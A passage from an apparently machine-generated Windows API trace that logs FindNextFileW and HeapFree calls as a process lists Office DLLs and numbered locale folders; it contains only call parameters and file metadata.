dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.420] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1de43d5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hi", cAlternateFileName="")) returned 1 [0066.422] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.422] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0f23aa6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16710914, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16710914, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr", cAlternateFileName="")) returned 1 [0066.424] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.424] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe4d066, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16710914, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16710914, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu", cAlternateFileName="")) returned 1 [0066.615] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.615] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf158c060, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="id", cAlternateFileName="")) returned 1 [0066.617] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.617] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf41a796b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf41a796b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf41cdbc1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Interop.MSDASC.dll", cAlternateFileName="INTERO~1.DLL")) returned 1 [0066.677] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.677] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd68243, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja", cAlternateFileName="")) returned 1 [0066.680] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.680] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf2ebae3b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kk", cAlternateFileName="")) returned 1 [0066.682] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.682] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe4d066, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko", cAlternateFileName="")) returned 1 [0066.687] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.687] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt", cAlternateFileName="")) returned 1 [0066.689] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.689] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf10a1263, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv", cAlternateFileName="")) returned 1 [0066.691] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.691] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf632eb9d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf632eb9d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf632eb9d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MDXQueryGenerator.DLL", cAlternateFileName="MDXQUE~1.DLL")) returned 1 [0066.699] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.699] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf03d07a0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167f56e9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl", cAlternateFileName="")) returned 1 [0066.701] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.701] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf45d3b76, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167cf4d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="no", cAlternateFileName="")) returned 1 [0066.703] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.703] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5ad675f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5ad675f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5ad675f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6faa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE.DLL", cAlternateFileName="")) returned 1 [0066.705] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.705] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa879350, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa879350, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa8eba59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2ba48, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPivotExcelClientAddIn.dll", cAlternateFileName="POWERP~1.DLL")) returned 1 [0066.707] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.707] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe00baf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167cf4d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0066.709] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.709] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfae48f06, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfae48f06, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfae6f174, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReportingServicesNativeClient.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0066.710] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.710] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefee59ce, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefee59ce, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1026", cAlternateFileName="")) returned 1 [0066.710] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.710] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1755c61, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1755c61, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1755c61, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="10266", cAlternateFileName="")) returned 1 [0066.710] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.710] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4266542, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4266542, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4266542, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1027", cAlternateFileName="")) returned 1 [0066.711] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.711] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xffd42fe2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffd42fe2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffd42fe2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1028", cAlternateFileName="")) returned 1 [0066.711] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.711] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf632eb9d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf632eb9d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf632eb9d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1029", cAlternateFileName="")) returned 1 [0066.711] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.711] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaf7a22a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfaf7a22a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfaf7a22a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1030", cAlternateFileName="")) returned 1 [0066.712] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.712] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x633d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x633d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x633d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1031", cAlternateFileName="")) returned 1 [0066.712] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.712] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e6a31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x51e6a31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x51e6a31, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1032", cAlternateFileName="")) returned 1 [0066.772] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.772] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42d8c51, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42fef17, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf42fef17, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 1 [0066.773] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.773] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a56cbe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a7cf13, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6a7cf13, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1035", cAlternateFileName="")) returned 1 [0066.791] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.791] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa911c96, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa911c96, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa911c96, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1036", cAlternateFileName="")) returned 1 [0066.792] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.792] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67a8250, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67a8250, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67a8250, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1037", cAlternateFileName="")) returned 1 [0066.792] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.792] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88e2fa3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x88e2fa3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x88e2fa3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1038", cAlternateFileName="")) returned 1 [0066.793] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.793] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x381f2dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x381f2dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x381f2dc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1040", cAlternateFileName="")) returned 1 [0066.797] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.797] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6355df6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6355df6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6355df6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1041", cAlternateFileName="")) returned 1 [0066.797] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.797] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf048f354, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf048f354, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf048f354, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1042", cAlternateFileName="")) returned 1 [0066.797] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.797] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x303975a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x303975a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x303975a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1043", cAlternateFileName="")) returned 1 [0066.798] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.798] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf61d7668, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf61fd8b4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf61fd8b4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1044", cAlternateFileName="")) returned 1 [0066.798] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.798] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf2ebae3b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf2ebae3b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf2ebae3b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1045", cAlternateFileName="")) returned 1 [0066.798] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.798] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1887f3e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1887f3e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1887f3e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1046", cAlternateFileName="")) returned 1 [0066.798] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.798] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5a8a2df, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5a8a2df, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5a8a2df, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1048", cAlternateFileName="")) returned 1 [0066.799] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.799] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b87f8e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6b87f8e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b87f8e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1049", cAlternateFileName="")) returned 1 [0066.799] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.799] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfcc62b13, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfcc62b13, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfcc62b13, 